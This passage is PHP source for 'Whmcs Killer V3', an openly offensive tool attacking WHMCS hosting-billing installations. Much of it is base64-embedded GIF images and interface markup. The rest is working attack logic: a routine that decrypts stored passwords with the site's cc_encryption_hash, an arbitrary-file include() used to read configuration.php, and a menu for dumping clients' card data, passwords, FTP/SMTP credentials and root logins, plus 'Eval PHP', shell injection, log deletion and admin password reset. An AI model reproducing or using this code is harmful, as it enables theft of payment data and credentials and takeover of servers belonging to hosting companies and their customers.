  103. echo (base64_decode('R0lGODlhBQBGAOYAAP////7+/vv7+/39/ebm5vT09Pz8/O/v7+3t7eHh4evr6/j4+Pn5+fHx8fLy8uPj4+np6ff39/b29t7e3tvb29jY2NbW1hWn9gWN1gaO19LS0gaK0gaM1BWn9QWJ0AWFygWGywSEyAR5uANtpgWM1YXQ+LvJ0UOw68fo+rHP38Ti8pXB2DaLuE+895KwwEGWxGelxrfi+Xq42dXX1/D4/ESx66nL3DqazkSk2NHZ3fH5/efv9M/X26nG1r7Hy/z+//z9/tTV1nC64ub0/E679QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAAAFAEYAAAfEgBcXLTFDHSUAiUQ/iQAojQA6kJMBlZaXmAOam5wGnp4CoaKjDKWlC6ioEaurEq6uBbGxDrS0Dbe3B7q6CL29CsDAEMPDBMbGD8nJCczMORPQEz0U1BQ3MxXZGzAW3RkgLC4+GRwfIiMYGCQeIYInKyYdQhr0NUHdFjbZ2TzVFNHQmjFTluyYMWLDggHz1WuXLly3atGSFeuVK1arUqEyVWqURwGfPHEaOQCTyUs0IKmAhANIow0yGn17kWIHOXPo1LELBAA7'));
  104. exit;
  105. }
  106. //-----------
  107. //menu-right.gif
  108. if ($_GET['img']==12){
  109. header('Content-Type: image/gif');
  110. echo (base64_decode('R0lGODlh8QFGAOYAAP////7+/v39/fv7++Hh4fz8/Pj4+Pn5+ff39/Hx8ebm5vLy8vb29uvr6+/v7+np6fT09O3t7ePj497e3tvb29bW1tjY2NLS0gR/wQJjl8/PzwRnnAJkmANlmQRmmxWn9gJmnAVonQR5uASAwwFilgWN1gaO1w2O0wNlmgNmmgJjmANtpgSEyBKf6gaDxQuL0AeFxwN0sAWJ0AaGywh1sBGZ4gZsogyL0BOh7QRnmwNkmQVongWFygqIzAeDxgWGywiFyQuLzweExxSl8gJmmwmHyg2O1BSk8QmIyw2N0gaK0gWM1QWDxQyHyAqKzgNspRGX3w+S2AqIzQeFyAyM0RWm9BWn9QiGygaM1A6P1RKa4waCxQqJzUCCpkCCpTV3m/D1+MTb6Huov2yszjZ4nNTY2kGn38PX4tXW15Ksuub0+z2VxYLC5LHL2fz9/vP3+Uefz77GyrvJ0JW9002z67bf9M7T1qe7xmeUrOfv86a9ygAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAADxAUYAAAf/gACCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnplqdXQ4VR8fn6ipqqusra6vsLGys4xsWkdWtLq7vL2+v8DBwolwNUPDyMnKy8zNzqphTS3P1NXW19jZr2A0UNrf4OHi49c2UQHo6err7O3u7/Dx8vP09fb3+Pn6+/z9/v8AAwocSJDgjiwFEypcyLChw4cQI0qcSJFeCCMVM2rcyLGjx48gQ8ILcUKAyZMoU6pcybKly5cwY8qcSbOmzZs4c+rcybOnz59AgwoVuqHk0KNIkypdyrSp06dQo0qNuSFJgatYs2rdyrWr169gw4odS7as2bNo06pdy7at27dw/+PKnTt3A5UBePPq3cu3r9+/gAMLHky4sOHDiBMrXsy4sePHkCNLnkyZ8oYblTNr3sy5s+fPoEOLHk2acI4XB1KrXs26tevXsGPLnk27tu3buHPr3s27t+/fwIMLH068eHEPQQwoX868ufPn0KNLn069uvXr2LNr3869u/fv4MOLH0++vHnzHpwgWM++vfv38OPLn0+/vv37+PPr38+/v///AAYo4IAEFmjggQd6wAUDDDbo4IMQRijhhBRWaOGFGGao4YYcdujhhyCGKOKIJJZo4okoopiCFBC06OKLMMYo44w01mjjjTjmqOOOPPbo449ABinkkEQWaeSRSCaZZP8KPSzg5JNQRinllFRWaeWVWGap5ZZcdunll2CGKeaYZJZp5plopqmmmiggkcCbcMYp55x01mnnnXjmqeeefPbp55+ABirooIQWauihiCaq6KKLolCEA5BGKumklFZq6aWYZqrpppx26umnoIYq6qiklmrqqaimquqqrLLawRURxCrrrLTWauutuOaq66689urrr8AGK+ywxBZr7LHIJqvsssw222wHQDQg7bTUVmvttdhmq+223Hbr7bfghivuuOSWa+656Kar7rrstuuuux1M8cC89NZr77345qvvvvz26++/AAcs8MAEF2zwwQgnrPDCDDfs8MMP6wCDAhRXbPH/xRhnrPHGHHfs8ccghyzyyCSXbPLJKKes8sost+zyyzDDzIEQEtRs880456zzzjz37PPPQAct9NBEF2300UgnrfTSTDft9NNQRx01Bz4QYPXVWGet9dZcd+3112CHLfbYZJdt9tlop6322my37fbbcMctt9wcbDHB3XjnrffefPft99+ABy744IQXbvjhiCeu+OKMN+7445BHLvnkkpfBgQsUZK755px37vnnoIcu+uikl2766ainrvrqrLfu+uuwxy777LTXTvsdRDBhwe689+7778AHL/zwxBdv/PHIJ6/88sw37/zz0Ecv/fTUV2/99dWjQcYTM1Tg/ffghy/+//jkl2/++einr/767Lfv/vvwxy///PTXb//9+OevP/54kCCCEhcIoAAHSMACGvCACEygAhfIwAY68IEQjKAEJ0jBClrwghjMoAY3yMEOYjAOafgCCWLwAxOAQAUZSKEKV8jCFrrwhTCMoQxnSMMa2vCGOMyhDnfIwx768IdADKIQh0jEIvpQBSBYgQh4gAUTjAADUIyiFKdIxSpa8YpYzKIWt8jFLnrxi2AMoxjHSMYymvGMaEyjGtfIxjOOgAUyWEIJSqCBOtrxjnjMox73yMc++vGPgAykIAdJyEIa8pCITKQiF8nIRjrykZCMJCPlMAczkMIUHsykJjfJyU568v+ToAylKEdJygWO4RZW2J8qV8nKVrrylbCMpSxnSctapm8NxsCeLnfJy1768pfADKYwh0nMYhpPD9KwnTKXycxmOvOZ0IymNKdJzWqSzg7doJw2t8nNbnrzm+AMpzjHSc5yDs4cc0unOtfJzna6853wjKc850lPsR1EavjMpz73yc9++vOfAA2oQAcatIvE7KAITahCF8rQhjr0oRCNqERBRhKIWfSiGM2oRjfK0Y569KMgDem/ivKukpr0pChNqUpXytKWuvSlMPVWVZxF05ra9KY4zalOd8rTnvr0p72yS6uGStSiGvWoSE2qUpfK1KY6lVOXYZRUp0rVqlr1qlj/zapWt8rVru7pNGsKq1jHStaymvWsaE2rWtfKVi0hR0lwjatc50rXutr1rnjNq173mqP0pOivgA2sYAdL2MIa9rCITaxiMaQgBDn2sZCNrGQnS9nKWvaymM3sfVZ0ns569rOgDa1oR0va0pr2tKi1DpOMw9rWuva1sI2tbGdL29ra9ra1aVNpdsvb3vr2t8ANrnCHCxhHEfe4yE2ucpfL3OZy5lV0ia50p0vd6lr3utjNrna3y92xQGsq4A2veMdL3vKa97zodUm80sve9rr3vfCNr3yVIjGR2Pe++M2vfvfLX4bMrL8ADrCAB0zgAkeEagZOsIIXzOAGD7hu5IiwboQnTOEKd+INl7OwhjfM4Q5T+Ay587CIR0ziEgvDDV7gnolXzOIWu5gTYvCfEl5M4xrb+MZ5aEMXRljCExrxx0AOspCHTOQiG/nISE6ykl2IRCUy0YltjLKUp0zlKlv5yljOspa3zOUrvjGOcwwEADs='));
  111. exit;
  112. }
  113. //-----------
  114. //menu.gif
  115. if ($_GET['img']==13){
  116. header('Content-Type: image/gif');
  117. echo (base64_decode('R0lGODlhAQBBANUAABis+xmt/QKI0Beq+QOK0gGHzhSl8hCe6wWN1Rap9xqu/giS3AqV3wKHzwaP2RWn9Q6b5xqv/wuX4gyY4w+d6Rir+giS2wmU3hGh7hKi7xmu/g2a5hOk8QeR2gSL0wyZ5AuW4RSl8wSM1Rao9gmT3QCGzQ6c6ACFzBWn9gaO1w2a5RSm9Bap+AWN1geQ2gqW4BKi8AGGzQ+e6gSL1Bit/BCf7BOj8E3T/wKJ0QaP2BGg7QAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAAABAEEAAAY7wFtEoQkEaABAZTBgJUaoxypk4NhgGYyudpBRTJCN6jORgF6MC2lh6bgcuVQLIZp5CAScQNAoFGIlJ0EAOw=='));
  118. exit;
  119. }
  120. //-----------
  121. //separator.gif
  122. if ($_GET['img']==14){
  123. header('Content-Type: image/gif');
  124. echo (base64_decode('R0lGODlhAQACAIAAAP///8/PzyH5BAAAAAAALAAAAAABAAIAAAICDAoAOw=='));
  125. exit;
  126. }
  127. //-----------
  128. //submenu-active.gif
  129. if ($_GET['img']==15){
  130. header('Content-Type: image/gif');
  131. echo (base64_decode('R0lGODlhDQBkAIABAOrq6v///yH5BAEAAAEALAAAAAANAGQAAAJLhI+py+0Po5y02ouz3rz7D4YiFUBB6Zwoo65K6yJwbMy0HeOuvvKoXwIKhQBfTXdAJm0JZhO2gEZVDWqV1hxpt9yu9wsOi8fkMqQAADs='));
  132. exit;
  133. }
  134. //-----------
  135. //submenu-sub.gif
  136. if ($_GET['img']==16){
  137. header('Content-Type: image/gif');
  138. echo (base64_decode('R0lGODlhCQAJAIABAJ+fn////yH5BAEAAAEALAAAAAAJAAkAAAINRI6pZ+vYnotSmRtuAQA7'));
  139. exit;
  140. }
  141. //-----------
  142. //tabs-l.gif
  143. if ($_GET['img']==19){
  144. header('Content-Type: image/gif');
  145. echo (base64_decode('R0lGODlhBADIALMAAOrq6t8AAOvr6/////Hx8eEPD/39/eESEuzs7OIbG+pUVOpXV/z8/Pzk5PrY2AAAACH5BAAAAAAALAAAAAAEAMgAAAQ9cLSV3AlB4VC2/2AojmRpnmiqrmzrvnAsz3RtDgaBMAIAED5AL0gsGo/IpHLJbDqf0Kh0Sq1ar9isdruMAAA7'));
  146. exit;
  147. }
  148. //-----------
  149. //tabs-r.gif
  150. if ($_GET['img']==20){
  151. header('Content-Type: image/gif');
  152. echo (base64_decode('R0lGODlh8AHIALMAAOrq6t8AAP///+vr6/Hx8eESEulRUfz8/OpXV/rV1ezs7OIbG/zk5P39/eEMDAAAACH5BAAAAAAALAAAAADwAcgAAAT/MMhJq7046827/2AojmRpnmiqrmzrrgvCCG9t33iu73zv/8BOIREsGo/IpHLJbGoMzqh0Sq1arzgHdsvter/gsHhMLpvP6LR6zW673/C4fE6v2+/4vH7P7/v/gIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7/Dx8vP09fb3+Pn6+/z9/v8AAwocSLCgwYMIEypcyLChw4cQI0qcSLGixYsYM2rcyLGjx48g/0OKHEmypMmTKFOqXMmypcuXMGPKnEmzps2bOHPq3Mmzp8+fQIMKHUq0qNGjSJMqXcq0qdOnUKNKnUq1qlUmALJq3cq1q9evYMOKHUu2rNmzaNOqXcu2rdu3cOPKnUu3rlwFBBoIsMu3r9+/gAMLHky4sOHDZAccQMy4sePHkCNLnkw5LIHKmDNr3sy5s+e/Az6LHk26tOnTqFOrXs26tevXsGPLnk27tu3buHPr3s27t+/fwIMLH068uPHjyJMrX868ufPn0KNLn069uvXr2LNr3869u/fv4MOLH0++vPnz6NOrX8++vfv38OPLn0+/vv37+PPr38+/v///AAYo4MSABBZo4IEIJqjgggw26OCDEEYo4YQUVmjhhRhmqOGGHHbo4YcghijiiCSWaOKJKKao4oostujiizDGKOOMNNZo44045qjjjjz26OOPQAYp5JBEFmnkkUgmqeSSTDbp5JNQRinllFRWaeWVWGap5ZZcdunll2CGKeaYZJZp5plopqnmmmy26eabcMYp55x01mnnnXjmqeeefPbp55+ABirooIQWauihiCaq6KKMNuroo5BGKumklFZq6aWYZqrpppx2OlkEADs='));
  153. exit;
  154. }
  155. //-----------
  156. //tray-logout.gif
  157. if ($_GET['img']==21){
  158. header('Content-Type: image/gif');
  159. echo (base64_decode('R0lGODlhDAAJAIABAIDQ/////yH5BAEAAAEALAAAAAAMAAkAAAITjB+Aa6B83JOUpoqzhRK254FBAQA7'));
  160. exit;
  161. }
  162. //-----------
  163. //tray.gif
  164. if ($_GET['img']==22){
  165. header('Content-Type: image/gif');
  166. echo (base64_decode('R0lGODlhAQAjAMQAADAwMDExMTIyMjU1NUxMTEFBQT8/P0pKSkdHR1BQUDk5OT4+PjQ0NDw8PDc3Nzo6OkJCQk9PTzMzM0REREhISDs7O05OTjY2NkVFRQAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAAABACMAAAUaYBJZBHFQCDZBhbE01aM41zAwkiAEfAD8vxAAOw=='));
  167. exit;
  168. }
  169. //-----------
  170. //ul-ul.gif
  171. if ($_GET['img']==23){
  172. header('Content-Type: image/gif');
  173. echo (base64_decode('R0lGODlhCAAIAMQAAM/Pz/////r6+t7e3vz8/N/f39TU1NbW1vv7+9LS0tPT0/j4+OHh4dzc3NXV1d3d3f39/QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAAAIAAgAAAUtYCAMSTIIAWEALGAgBTAQxAAUKyq6CqALAEWssVg8bohDC+BABCCMw4FBCIQAADs='));
  174. exit;
  175. }
  176. //-----------
  177. //ul.gif
  178. if ($_GET['img']==24){
  179. header('Content-Type: image/gif');
  180. echo (base64_decode('R0lGODlhCAAIAMQAAN8AAP///+lOTuQkJP3t7fzn5+IXF+pXV/rb2+pUVOEREeIaGvzk5OtgYPzr6/zl5ehFReMeHvzq6uIYGOlRUf3w8OIbG/729uhLSwAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAAAIAAgAAAUzYPAIiiI8AWEBLDBJByAQBAUcC8AEAQMsBkCBVwAYEgAIAoEBJByDFiDiCFwag0GjEggBADs='));
  181. exit;
  182. }
  183. //-----------
  184. #####################
  185. function login()
  186. {
  187. echo"\n
  188. <center><div id='content' class='box'>
  189. \n<br>\n<center>\n\n<h3 class=\"tit\">
  190. DB configuration of WHMCS</h3><br>\n</center>\n
  191. <FORM action=\"\" method=\"post\" >\n
  192. <input type=\"hidden\" name=\"form_action\" value=\"1\">\n<br>\n
  193. <table >\n\n
  194. <tr class='bg'><td>Database Host </td><td><input type=\"text\" size=\"60\" name=\"db_host\" value=\"".$_COOKIE["db_host"]."\"></td></tr>
  195. \n<tr ><td>Database Username </td><td><input type=\"text\" size=\"60\" name=\"db_username\" value=\"".$_COOKIE["db_username"]."\"></td></tr>
  196. \n<tr class='bg'><td>Database Password</td><td><input type=\"text\" size=\"60\" name=\"db_password\" value=\"".$_COOKIE["db_password"]."\"></td></tr>
  197. \n<tr><td>Database Name</td><td><input type=\"text\" size=\"60\" name=\"db_name\" value=\"".$_COOKIE["db_name"]."\"></td></tr>
  198. \n<tr class='bg'><td>cc_encryption_hash</td><td><input type=\"text\" size=\"60\" name=\"cc_encryption_hash\" value=\"".$_COOKIE["cc_encryption_hash"]."\"></td></tr>
  199. \n\n\n</table\n<br>\n
  200. <INPUT class=\"input-submit\" type=\"submit\" value=\"Submit\" name=\"Submit\">\n</FORM>
  201. \n\n\n<h3 class=\"tit\">Symlink to configuration.php of WHMCS</h3><br>\n\n
  202. <FORM action=\"\" method=\"post\">
  203. <input type=\"hidden\" name=\"form_action\" value=\"2\"><br>\n
  204. <table ><tr class='bg'><td><input type=\"text\" size=\"30\" name=\"file\" value=\"\">\n<br>\n </td><td><INPUT class=\"input-submit\" type=\"submit\" value=\"Submit\" name=\"Submit\"></td></tr></table>
  205. \n</FORM>";
  206. if ($_COOKIE["login"]=="1")
  207. {
  208. $key=$_COOKIE["db_name"]."-".base64_encode(base64_encode($_COOKIE["db_host"])."|".base64_encode($_COOKIE["db_username"])."|".base64_encode($_COOKIE["db_password"])."|".base64_encode($_COOKIE["db_name"])."|".base64_encode($_COOKIE["cc_encryption_hash"])."|");
  209. echo "<p class='msg info'>Short info is <br><textarea cols=50 rows='4'>$key</textarea></p><br>";
  210. }
  211. echo "<h3 class=\"tit\">Short info</h3><FORM action=\"\" method=\"post\">
  212. \n<input type=\"hidden\" name=\"form_action\" value=\"3\">\n<br>\n
  213. <table ><tr class='bg'><td><input type=\"text\" size=\"60\" name='key' ></td><td>
  214. </td><td><INPUT class=\"input-submit\" type=\"submit\" value=\"Submit\" name=\"Submit\"></td></tr></table>
  215. \n</FORM></center></div>
  216. <br>
  217. ";
  218. echo '</div> <!-- /cols -->
  219. <hr class="noscreen" />
  220. <!-- Footer -->
  221. <div id="footer" class="box">
  222. <p class="f-left">Coded by <a href="http://www.rab3oun.net">RAB3OUN</a>, </p>
  223. <p class="f-right">Templates by Adminizio</p>
  224. </div> <!-- /footer -->
  225. </div> <!-- /main -->
  226. </body>
  227. </html>';
  228. }
  229. #####################
  230. function decrypt($string,$cc_encryption_hash)
  231. {
  232. $key=md5(md5($cc_encryption_hash)).md5($cc_encryption_hash);
  233. $hash_key=_hash($key);
  234. $hash_length=strlen($hash_key);
  235. $string=base64_decode($string);
  236. $tmp_iv=substr($string,0,$hash_length);
  237. $string=substr($string,$hash_length,strlen($string)-$hash_length);
  238. $iv=$out="";
  239. $c=0;
  240. while($c<$hash_length)
  241. {
  242. $iv.=chr(ord($tmp_iv[$c])^ord($hash_key[$c]));
  243. ++$c;
  244. }
  245. $key=$iv;
  246. $c=0;
  247. while($c<strlen($string))
  248. {
  249. if(($c!=0 AND$c%$hash_length==0))
  250. {
  251. $key=_hash($key.substr($out,$c-$hash_length,$hash_length));
  252. }
  253. $out.=chr(ord($key[$c%$hash_length])^ord($string[$c]));
  254. ++$c;
  255. }
  256. return$out;
  257. }
  258. #####################
  259. function _hash($string)
  260. {
  261. if(function_exists("sha1"))
  262. {
  263. $hash=sha1($string);
  264. }
  265. else
  266. {
  267. $hash=md5($string);
  268. }
  269. $out="";
  270. $c=0;
  271. while($c<strlen($hash))
  272. {
  273. $out.=chr(hexdec($hash[$c].$hash[$c+1]));
  274. $c+=2;
  275. }
  276. return$out;
  277. }
  278. #####################
  279. function randomt()
  280. {
  281. $chars="abcdefghijkmnopqrstuvwxyz023456789";
  282. srand((double)microtime()*1000000);
  283. $i=0;
  284. $pass="";
  285. while($i<=7)
  286. {
  287. $num=rand()%33;
  288. $tmp=substr($chars,$num,1);
  289. $pass=$pass.$tmp;
  290. $i++;
  291. }
  292. return$pass;
  293. }
  294. #####################
  295. @set_time_limit(0);
  296. ob_start();
  297. if($auth==1)
  298. {
  299. if(!isset($_SERVER["PHP_AUTH_USER"])||md5($_SERVER["PHP_AUTH_USER"])!==$user||md5($_SERVER["PHP_AUTH_PW"])!==$pass)
  300. {
  301. header("WWW-Authenticate: Basic realm='Powered By RAB3OUN'");
  302. header("HTTP/1.0 401 Unauthorized");
  303. exit("Go To Hell");
  304. }
  305. }
  306. $p=$_GET["p"];
  307. if($_POST["form_action"]==1)
  308. {
  309. setcookie("db_host",$_POST["db_host"]);
  310. setcookie("db_username",$_POST["db_username"]);
  311. setcookie("db_password",$_POST["db_password"]);
  312. setcookie("db_name",$_POST["db_name"]);
  313. setcookie("login","1");
  314. setcookie("cc_encryption_hash",$_POST["cc_encryption_hash"]);
  315. $c=@mysql_connect($_POST["db_host"],$_POST["db_username"],$_POST["db_password"]);
  316. $c2=@mysql_select_db($_POST["db_name"],$c);
  317. if ($c and $c2)
  318. {
  319. echo '<center><p class="msg done">Done : Connection Successfully </p></center>';
  320. echo("<meta http-equiv='refresh' content='1;URL=?p=102' />");
  321. }
  322. else{
  323. echo '<p class="msg error">Database error</p>';
  324. }
  325. }
  326.  
  327. if($_POST["form_action"]==2)
  328. {
  329. $file=($_POST["file"]);
  330. include($file);
  331. /*
  332. $text=file_get_contents($file);
  333. $text=str_replace("<?php","",$text);
  334. $text=str_replace("<?","",$text);
  335. $text=str_replace("?>","",$text);
  336. eval($text);*/
  337.  
  338. setcookie("db_host",$db_host);
  339. setcookie("db_username",$db_username);
  340. setcookie("db_password",$db_password);
  341. setcookie("db_name",$db_name);
  342. setcookie("login","1");
  343. setcookie("cc_encryption_hash",$cc_encryption_hash);
  344. $c=@mysql_connect($db_host,$db_username,$db_password);
  345. $c2=mysql_select_db($db_name,$c);
  346. if ($c and $c2)
  347. {
  348. echo '<center><p class="msg done">Done : Connection Successfully </p></center>';
  349. echo("<meta http-equiv='refresh' content='1;URL=?p=102' />");
  350. }
  351. else{
  352. echo '<p class="msg error">Database error</p>';
  353. }
  354. }
  355. if($_POST["form_action"]==3)
  356. {
  357. $key=($_POST["key"]);
  358. $key=explode("-",$key);
  359. $v=explode("|",base64_decode($key[1]));
  360. setcookie("db_host",base64_decode($v[0]));
  361. setcookie("db_username",base64_decode($v[1]));
  362. setcookie("db_password",base64_decode($v[2]));
  363. setcookie("db_name",base64_decode($v[3]));
  364. setcookie("login","1");
  365. setcookie("cc_encryption_hash",base64_decode($v[4]));
  366. $c=@mysql_connect(base64_decode($v[0]),base64_decode($v[1]),base64_decode($v[2]));
  367. $c2=@mysql_select_db(base64_decode($v[3]),$c);
  368. if ($c and $c2)
  369. {
  370. echo '<center><p class="msg done">Done : Connection Successfully </p></center>';
  371. echo("<meta http-equiv='refresh' content='1;URL=?p=102' />");
  372. }
  373. else{
  374. echo '<p class="msg error">Database error</p>';
  375. }
  376. echo("<meta http-equiv='refresh' content='1;URL=?p=102' />");
  377. }
  378. function header2() {
  379. global $currentFile;
  380. echo "
  381. <html><title>Whmcs Killer V3 (Coded by RAB3OUN)</title><head>";
  382. echo '
  383. <link rel="stylesheet" media="screen,projection" type="text/css" href="'.$currentFile.'?css=1" />
  384. <link rel="stylesheet" media="screen,projection" type="text/css" href="'.$currentFile.'?css=5" />
  385. <link rel="stylesheet" media="screen,projection" type="text/css" href="'.$currentFile.'?css=4" title="2col" />
  386. <link rel="alternate stylesheet" media="screen,projection" type="text/css" href="'.$currentFile.'?css=3" title="1col" />
  387.  
  388. <link rel="stylesheet" media="screen,projection" type="text/css" href="'.$currentFile.'?css=2" /> <!-- GRAPHIC THEME -->
  389.  
  390. ';
  391. echo "
  392. <style>
  393. #content {border:1px solid #afafaf; background:#fff;width:650;}
  394. </style>
  395. <meta http-equiv='Content-Type' content='text/html; charset=utf-8' />
  396. </head>\n<body >
  397. <center><img src='?img=0'></center>
  398. ";
  399. }
  400. function header1() {
  401. global $currentFile;
  402. @$query0=mysql_query("SELECT value FROM tblconfiguration where setting='Charset' or setting='charset'");
  403. @$v0=mysql_fetch_array($query0);
  404. $charset=$v0['value'] ? $v0['value'] : "utf-8";
  405. echo '<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  406. <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
  407. <head>
  408. <meta http-equiv="Content-Type" content="text/html; charset='.$charset.'" />
  409. <meta http-equiv="content-language" content="en" />
  410. <meta name="robots" content="noindex,nofollow" />
  411.  
  412. <link rel="stylesheet" media="screen,projection" type="text/css" href="'.$currentFile.'?css=1" /> <!-- RESET -->
  413. <link rel="stylesheet" media="screen,projection" type="text/css" href="'.$currentFile.'?css=5" /> <!-- MAIN STYLE SHEET -->
  414. <link rel="stylesheet" media="screen,projection" type="text/css" href="'.$currentFile.'?css=4" title="2col" /> <!-- DEFAULT: 2 COLUMNS -->
  415. <link rel="alternate stylesheet" media="screen,projection" type="text/css" href="'.$currentFile.'?css=3" title="1col" /> <!-- ALTERNATE: 1 COLUMN -->
  416.  
  417. <link rel="stylesheet" media="screen,projection" type="text/css" href="'.$currentFile.'?css=2" /> <!-- GRAPHIC THEME -->
  418.  
  419. <title>Whmcs Killer V3 (Coded by RAB3OUN)</title>
  420. </head>
  421. <body>
  422. <div id="main">
  423. <?/**/?>
  424. <!-- Tray -->
  425. <div id="tray" class="box">
  426. <p class="f-left box">
  427.  
  428. <strong>WHMCS KILLER V3 </strong>
  429. </p>
  430. <p class="f-right">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <strong><a href="?p=9" id="logout">Log out</a></strong></p>
  431. </div> <!-- /tray -->
  432. <hr class="noscreen" />
  433. <center><img src="?img=0"></center>
  434. <hr class="noscreen" />
  435. <!-- Columns -->
  436. <div id="cols" class="box">
  437. <!-- Aside (Left Column) -->
  438. <div id="aside" class="box">
  439. <div class="padding box">
  440.  
  441.  
  442.  
  443. </div> <!-- /padding -->
  444. <ul class="box">';
  445.  
  446.  
  447. $menu=array('h' => 'Home' ,
  448. '102' => 'Info' ,
  449. '1' => 'H0st r00ts' ,
  450. '2' => 'Domains Resellers' ,
  451. '3' => 'Clients r00ts' ,
  452. '4' => 'Clients Hosting Accounts' ,
  453. '5' => 'Clients CC' ,
  454. '52' => 'Clients CC 2' ,
  455. '63' => 'Clients Tickets ' ,
  456. '100' => 'Clients List ' ,
  457. '105' => 'Clients Password' ,
  458. '7' => 'FTP and SMTP password' ,
  459. '8' => 'Tools' ,
  460. '101' => 'Eval PHP' ,
  461. '99" target="blank' => 'SQL' ,
  462. '11' => 'BackUp' ,
  463. '106' => 'DailyEmailBackup' ,
  464. '108' => '1nj3c7 Sh311' ,
  465. '109' => 'Payment Gateways' ,
  466. '111' => 'Addon Modules' ,
  467. '107' => 'Index' ,
  468. // '110' => 'Load File' ,
  469. '112' => 'Custom Fields' );
  470. if($_COOKIE["login"]<>"1") $menu=array("c1"=>"Db Config","c2"=>"Symlink to configuration.php of WHMCS","c3"=>"Short info");
  471. foreach ($menu as $x=>$y){
  472. if ($_GET['p']==$x)
  473. {
  474. echo("<li id='submenu-active'>\n<a href=\"?p=$x\"> $y</a>");
  475. }
  476. else
  477. {
  478. echo("<li ><a href=\"?p=$x\" > $y</a>");
  479. }
  480. if (($x==8))
  481. {
  482.  
  483. echo '<ul>';
  484. echo "<li><a href=\"?p=8&page=1\" > Upload</a></li>
  485. <li><a href=\"?p=8&page=2\" >Delete Adminlog </a></li>
  486. <li><a href=\"?p=8&page=3\" >Change Admin Password to 123456</a></li>
  487. <li><a href=\"?p=8&page=4\" >Change Client Password to 123456</a></li>
  488. <li><a href=\"?p=8&page=5\" >Change Client Mail </a></li>
  489. <li><a href=\"?p=8&page=6\" >Decrypt Password</a></li>";
  490. echo '</ul>';
  491. echo "</li>";
  492. }else{
  493. echo "</li>";
  494. }
  495. }
  496. ?>
  497. </ul>
  498.  
  499.  
  500. </div> <!-- /aside -->
  501. <hr class="noscreen" />
  502. <!-- Content (Right Column) -->
  503. <div id="content" class="box">
  504.  
  505. <?php
  506. }
  507. if($_COOKIE["login"]=="1")
  508. {
  509. $db_host=($_COOKIE["db_host"]);
  510. $db_username=($_COOKIE["db_username"]);
  511. $db_password=($_COOKIE["db_password"]);
  512. $db_name=($_COOKIE["db_name"]);
  513. $cc_encryption_hash=($_COOKIE["cc_encryption_hash"]);
  514. $link=@mysql_connect($db_host,$db_username,$db_password);
  515. mysql_select_db($db_name,$link);
  516. }
  517. if($p and($_COOKIE["login"]<>"1"))
  518. {
  519.  
  520. header2();
  521. login();
  522. exit;
  523. }
  524. if(($_COOKIE["login"]<>"1"))
  525. {
  526.  
  527. header2();
  528. login();
  529. exit;
  530. }
  531. $db_host=($_COOKIE["db_host"]);
  532. $db_username=($_COOKIE["db_username"]);
  533. $db_password=($_COOKIE["db_password"]);
  534. $db_name=($_COOKIE["db_name"]);
  535. $cc_encryption_hash=($_COOKIE["cc_encryption_hash"]);
  536. $link=@mysql_connect($db_host,$db_username,$db_password);
  537. mysql_select_db($db_name,$link);
  538. if(!$link)
  539. {
  540. echo("<h1>Database error</h1>");
  541. header1();
  542. login();
  543. exit;
  544. }
  545. if($p) header1();
  546. echo '<a style="display:scroll;position:fixed;bottom:5px;right:5px;" href="#" title="Back to Top"><img src="?img=1" /></a> ';
  547. switch($p)
  548. {
  549. ################################################### Menu
  550. case"m":
  551. echo("<table><tr><td><a href=\"?p=h\" target=\"frame1\"> Home</a></td></tr><tr><td>\n<a href=\"?p=102\" target=\"frame1\"> Info</a></td></tr><tr><td>\n<a href=\"?p=1\" target=\"frame1\"> H0st r00ts</a></td></tr><tr><td>\n<a href=\"?p=2\" target=\"frame1\"> Domains Resellers</a></td></tr><tr><td>\n<a href=\"?p=3\" target=\"frame1\"> Clients r00ts</a></td></tr><tr><td>\n<a href=\"?p=4\" target=\"frame1\"> Clients Hosting Accounts</a></td></tr><tr><td>\n<a href=\"?p=5\" target=\"frame1\"> Clients CC</a></td></tr><tr><td>\n<a href=\"?p=63\" target=\"frame1\"> Clients Tickets </a></td></tr><tr><td>\n<a href=\"?p=7\" target=\"frame1\"> FTP and SMTP password</a></td></tr><tr><td>\n
  552. <a href=\"?p=8\" target=\"frame1\"> Tools</a>
  553. </td></tr><tr><td>\n<a href=\"?p=99\" target=\"frame1\"> SQL</a></td></tr><tr><td>\n<a href=\"?p=100\" target=\"frame1\"> Clients list </a></td></tr><tr><td>\n<a href=\"?p=105\" target=\"frame1\">Clients Password</a></td></tr><tr><td>\n<a href=\"?p=11\" target=\"frame1\">BackUp</a></td></tr><tr><td>\n<a href=\"?p=101\" target=\"frame1\">Eval PHP</a></td></tr><tr><td>\n<a href=\"?p=106\" target=\"frame1\"> DailyEmailBackup</a></td></tr><tr><td><a href=\"?p=107\" target=\"frame1\"> Index</a></td></tr><tr><td><a href=\"?p=108\" target=\"frame1\"> 1nj3c7 Sh311</a></td></tr><tr><td><a href=\"?p=109\" target=\"frame1\"> Payment Gateways</a></td></tr><tr><td><a href=\"?p=111\" target=\"frame1\"> Addon Modules</a></td></tr><tr><td><a href=\"?p=110\" target=\"frame1\"> Load File</a></td></tr><tr><td><a 